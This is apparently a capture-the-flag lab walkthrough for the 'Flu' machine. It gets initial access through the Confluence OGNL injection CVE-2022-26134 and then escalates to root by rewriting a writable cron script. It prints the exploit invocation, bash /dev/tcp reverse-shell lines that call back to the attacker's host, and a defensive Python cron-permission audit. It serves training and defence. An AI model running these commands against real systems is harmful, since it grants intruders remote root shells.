# Flu

`confluence` `pspy`

* Machine name: Flu
* Difficulty: Intermediate
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 17:30 EDT
Nmap scan report for 192.168.208.41
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 02:79:64:84:da:12:97:23:77:8a:3a:60:20:96:ee:cf (ECDSA)
|_  256 dd:49:a3:89:d7:57:ca:92:f0:6c:fe:59:a6:24:cc:87 (ED25519)
8090/tcp open  opsmessaging?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 302 
|     Cache-Control: no-store
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     X-Confluence-Request-Time: 1724794241442
|     Set-Cookie: JSESSIONID=C695CF2E7504EE870832EE6F8F423F54; Path=/; HttpOnly
|     X-XSS-Protection: 1; mode=block
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: SAMEORIGIN
|     Content-Security-Policy: frame-ancestors 'self'
|     Location: http://localhost:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 0
|     Date: Tue, 27 Aug 2024 21:30:41 GMT
|     Connection: close
|   HTTPOptions: 
|     HTTP/1.1 200 
|     MS-Author-Via: DAV
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 0
|     Date: Tue, 27 Aug 2024 21:30:41 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1924
|     Date: Tue, 27 Aug 2024 21:30:41 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP&#47;1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
8091/tcp open  jamlink?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 204 No Content
|     Server: Aleph/0.4.6
|     Date: Tue, 27 Aug 2024 21:31:17 GMT
|     Connection: Close
|   GetRequest: 
|     HTTP/1.1 204 No Content
|     Server: Aleph/0.4.6
|     Date: Tue, 27 Aug 2024 21:30:46 GMT
|     Connection: Close
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Tue, 27 Aug 2024 21:30:46 GMT
|     Connection: Close
|     content-length: 0
|   Help, Kerberos, LDAPSearchReq, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 414 Request-URI Too Long
|     text is empty (possibly HTTP/0.9)
|   RTSPRequest: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Tue, 27 Aug 2024 21:30:46 GMT
|     Connection: Keep-Alive
|     content-length: 0
|   SIPOptions: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Tue, 27 Aug 2024 21:31:22 GMT
|     Connection: Keep-Alive
|_    content-length: 0

```

### HTTP (8090)

Confluence 7.13.6

{% embed url="https://github.com/jbaines-r7/through_the_wire" %}

## Initial access

```
┌──(kali㉿kali)-[~/oscp/flu]
└─$ python3 script.py --rhost 192.168.208.41 --rport 8090 --lhost 192.168.45.224 --protocol http:// --reverse-shell

   _____ _                           _     
  /__   \ |__  _ __ ___  _   _  __ _| |__  
    / /\/ '_ \| '__/ _ \| | | |/ _` | '_ \ 
   / /  | | | | | | (_) | |_| | (_| | | | |
   \/   |_| |_|_|  \___/ \__,_|\__, |_| |_|
                               |___/       
   _____ _            __    __ _           
  /__   \ |__   ___  / / /\ \ (_)_ __ ___  
    / /\/ '_ \ / _ \ \ \/  \/ / | '__/ _ \ 
   / /  | | | |  __/  \  /\  /| | | |  __/ 
   \/   |_| |_|\___|   \/  \/ |_|_|  \___| 

                 jbaines-r7                
               CVE-2022-26134              
      "Spit my soul through the wire"    
                     🦞                   

[+] Forking a netcat listener
[+] Using /usr/bin/nc
[+] Generating a reverse shell payload
[+] Sending expoit at http://192.168.208.41:8090/
listening on [any] 1270 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.208.41] 52560
bash: cannot set terminal process group (733): Inappropriate ioctl for device
bash: no job control in this shell
confluence@flu:/opt/atlassian/confluence/bin$ 

```

## Privilege escalation

After a first look around and a first run of linpeas.sh, nothing interesting turns up. However, there is an odd file in /opt... a file that could very well be executed automatically (and we have write permission on it). We will check with pspy64.

```
{...}
2024/08/27 22:12:01 CMD: UID=0     PID=25442  | /bin/sh -c gzip 
2024/08/27 22:12:01 CMD: UID=0     PID=25443  | find /root/backup -name log_backup_* -mmin +5 -exec rm -rf {} ; 
2024/08/27 22:12:01 CMD: UID=0     PID=25444  | find /root/backup -name log_backup_* -mmin +5 -exec rm -rf {} ; 
2024/08/27 22:12:01 CMD: UID=0     PID=25445  | find /root/backup -name log_backup_* -mmin +5 -exec rm -rf {} ; 
2024/08/27 22:13:01 CMD: UID=1001  PID=25446  | bash -c bash -i >& /dev/tcp/192.168.45.224/1270 0>&1 
2024/08/27 22:13:01 CMD: UID=1001  PID=25448  | 
2024/08/27 22:13:01 CMD: UID=1001  PID=25449  | bash -i 
2024/08/27 22:13:01 CMD: UID=0     PID=25450  | /usr/sbin/CRON -f -P 
2024/08/27 22:13:01 CMD: UID=0     PID=25451  | /usr/sbin/CRON -f -P 
2024/08/27 22:13:01 CMD: UID=0     PID=25452  | 
2024/08/27 22:13:01 CMD: UID=0     PID=25453  | /bin/bash /opt/log-backup.sh 
2024/08/27 22:13:01 CMD: UID=0     PID=25454  | /bin/bash /opt/log-backup.sh 
2024/08/27 22:13:01 CMD: UID=0     PID=25456  | tar -czf /root/backup/log_backup_20240827221301.tar.gz /root/backup/log_backup_20240827221301 
2024/08/27 22:13:01 CMD: UID=0     PID=25455  | tar -czf /root/backup/log_backup_20240827221301.tar.gz /root/backup/log_backup_20240827221301 
2024/08/27 22:13:01 CMD: UID=0     PID=25457  | /bin/sh -c gzip 
2024/08/27 22:13:01 CMD: UID=0     PID=25458  | /bin/bash /opt/log-backup.sh 
2024/08/27 22:13:01 CMD: UID=0     PID=25459  | rm -rf /root/backup/log_backup_20240827220801.tar.gz 
2024/08/27 22:13:01 CMD: UID=0     PID=25460  | 
2024/08/27 22:13:06 CMD: UID=1001  PID=25461  | ls 
{...}
```

`/bin/bash /opt/log-backup.sh`

```
confluence@flu:/opt$ echo '#!/bin/bash' > log-backup.sh
confluence@flu:/opt$ echo '/bin/bash -i >& /dev/tcp/192.168.45.224/1234 0>&1' >> log-backup.sh
```

```
┌──(kali㉿kali)-[~/oscp/flu]
└─$ nc -lnvp 1234                                                                                                  
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.208.41] 52144
bash: cannot set terminal process group (25516): Inappropriate ioctl for device
bash: no job control in this shell
root@flu:~# whoami
whoami
root
```
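The root path here was a cron job running a script in /opt that the confluence user could modify. As an added example (not part of the original write-up), the audit below parses /etc/crontab-style entries and flags any root-run script that is not owned by root or is group/world-writable; the function names, the sample crontab and the temporary scripts it checks are constructed for the demo.

```python
import os
import shlex
import tempfile

INTERPRETERS = {"sh", "bash", "dash", "python3", "perl"}

def script_of(command):
    """First path a cron command runs, skipping interpreters and flags."""
    for tok in shlex.split(command):
        if not tok.startswith("-") and os.path.basename(tok) not in INTERPRETERS:
            return tok
    return None

def weak_permissions(path):
    """Reasons a non-root user could alter the file; [] if owner and mode look sane."""
    st = os.stat(path)
    reasons = []
    if st.st_uid != 0:
        reasons.append("owner uid %d is not root" % st.st_uid)
    if st.st_mode & 0o020:
        reasons.append("group-writable")
    if st.st_mode & 0o002:
        reasons.append("world-writable")
    return reasons

def audit_crontab(text):
    """Map script -> reasons for root entries (min hour dom mon dow user cmd) a non-root user could edit."""
    findings = {}
    for line in text.splitlines():
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[0].startswith("#") or fields[5] != "root":
            continue  # blank, comment, env assignment or @reboot-style line
        script = script_of(fields[6])
        if script and os.path.isfile(script):
            reasons = weak_permissions(script)
            if reasons:
                findings[script] = reasons
    return findings

def demo():
    """Constructed sample: a world-writable backup script (stand-in for /opt/log-backup.sh) beside a 755 one."""
    d = tempfile.mkdtemp()
    weak, sane = os.path.join(d, "log-backup.sh"), os.path.join(d, "rotate.sh")
    for p in (weak, sane):
        with open(p, "w") as f:
            f.write("#!/bin/bash\n")
    os.chmod(weak, 0o777)
    os.chmod(sane, 0o755)
    crontab = "*/5 * * * * root /bin/bash %s\n0 3 * * * root %s\n" % (weak, sane)
    return audit_crontab(crontab), weak, sane
```

Run against the real /etc/crontab and /etc/cron.d/* on a host to list every root cron script a service account could rewrite; the fix is root ownership and mode 755 or stricter.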
